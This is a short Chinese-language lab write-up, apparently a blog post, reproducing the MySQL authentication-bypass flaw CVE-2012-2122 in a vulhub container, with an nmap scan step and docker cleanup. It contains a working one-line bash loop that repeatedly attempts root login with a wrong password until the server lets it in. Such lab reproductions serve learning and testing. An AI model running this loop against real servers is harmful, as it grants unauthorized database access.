CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
喜欢的名字被抢了11 小时前
MongoDB生产实践:架构设计、分片集群与运维监控
数据库·mongodb·教程
红糖奶茶11 小时前
MySQL 8.0的自增主键持久化特性
数据库·mysql·adb
Macbethad11 小时前
基于TwinCAT的半导体刻蚀设备SCADA管理程序技术方案
运维·网络·数据库
ai_coder_ai12 小时前
编写自动化脚本,在自己后端服务中使用云原生Baas服务进行设备相关操作
数据库·云原生·自动化
oradh12 小时前
Oracle DG主备架构的基本维护操作总结
数据库·oracle·架构·dg主备架构的基本维护操作总结
xieliyu.12 小时前
MySQL 六大基础约束详解:NOT NULL/DEFAULT/UNIQUE/ 主键 / 外键 / CHECK
android·数据库·sql·mysql
Anokata13 小时前
MYSQL SQL 执行系列1
android·sql·mysql
JSON_L13 小时前
MongoDB文档关系详解
数据库·mongodb
卓怡学长13 小时前
w268基于springboot + vue 物流系统
java·数据库·vue.js·spring boot·spring·intellij-idea
CodeStats13 小时前
《源纹天书》第一百四十一章至第一百四十五章:etcd升级、2PC的阻塞困境、3PC的超时突破、TCC的补偿之道、Saga的最终选择!
java·大数据·数据库·etcd·源纹天书